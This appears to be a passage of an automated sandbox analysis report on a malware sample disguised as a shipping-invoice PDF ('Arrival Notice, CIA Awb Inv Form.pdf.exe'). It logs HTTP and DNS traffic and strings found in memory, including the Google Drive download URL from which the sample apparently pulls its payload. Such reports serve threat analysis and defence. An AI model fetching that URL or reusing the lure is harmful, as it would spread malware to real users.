Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:09:53 GMTContent-Type: text/htmlContent-Length: 275ETag: "6197bde3-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:10:33 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Nov 2021 14:12:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 24 Nov 2021 14:14:34 GMTContent-Type: text/htmlContent-Length: 275ETag: "61951b77-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: explorer.exe, 00000007.00000000.22755704421.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22655480693.000000000D59B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22985193767.000000000D59B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: http://s.symcd.com06
Source: explorer.exe, 00000007.00000000.22975794820.000000000A7C0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22635050466.0000000002FB0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000000.22646529192.0000000009AB0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.micro
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=a
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000000.22750707443.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22980392582.000000000D05E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22651288186.000000000D05E000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.22738052664.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22641184172.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22967614281.0000000009340000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22686996294.0000000009340000.00000004.00000001.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivation
Source: explorer.exe, 00000007.00000000.22689085611.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22969621202.00000000094EB000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22643182960.00000000094EB000.00000004.00000001.sdmp	String found in binary or memory: https://contentstorage.osi.office.net/dynamiccanvas/licensingui/index.html?mode=NewDeviceActivationi
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22619512198.000000000091D000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: NETSTAT.EXE, 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, NETSTAT.EXE, 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625529754.0000000000908000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816989245.00000000008D8000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/%%doc-14-5s-docs.googleusercontent.com
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817351739.0000000000907000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt6
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22625903435.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817443530.0000000000918000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22623529226.000000000091C000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000003.22624760736.0000000000918000.00000004.00000001.sdmp	String found in binary or memory: https://doc-14-5s-docs.googleusercontent.com/tography
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22818584241.00000000023F0000.00000004.00000001.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22817051370.00000000008E0000.00000004.00000020.sdmp, Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCB
Source: Arrival Notice, CIA Awb Inv Form.pdf.exe, 00000006.00000002.22816876287.00000000008C2000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFCh&
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000000.22763778263.0000000010ADD000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22709261731.00000000109B4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22661302850.00000000109B4000.00000004.00000001.sdmp	String found in binary or memory: https://ims-na1.adobelogin.com/ims/authorize/v1?locale=en_us&client_id=AdobeReader9&redirect_uri=htt
Source: explorer.exe, 00000007.00000000.22659836034.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22707875865.000000001067D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22760864296.000000001067D000.00000004.00000001.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000000.22984417636.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22754900142.000000000D4F4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654737060.000000000D4F4000.00000004.00000001.sdmp	String found in binary or memory: https://powerpoint.office.come
Source: NETSTAT.EXE, 00000008.00000002.26929375069.00000000039BF000.00000004.00020000.sdmp	String found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=e&domain=izivente.com&origin=sales_lander
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000007.00000000.22704620930.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22986677846.000000000D6D5000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22656652438.000000000D6D5000.00000004.00000001.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22727056323.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22956960258.0000000000B94000.00000004.00000020.sdmp, explorer.exe, 00000007.00000000.22632233648.0000000000B94000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/?ocid=iehpA
Source: explorer.exe, 00000007.00000000.22984664449.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22755147117.000000000D525000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22654970416.000000000D525000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
Source: explorer.exe, 00000007.00000000.22685687246.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22966433478.000000000516B000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.22640100372.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown

DNS traffic detected: queries for: drive.google.com

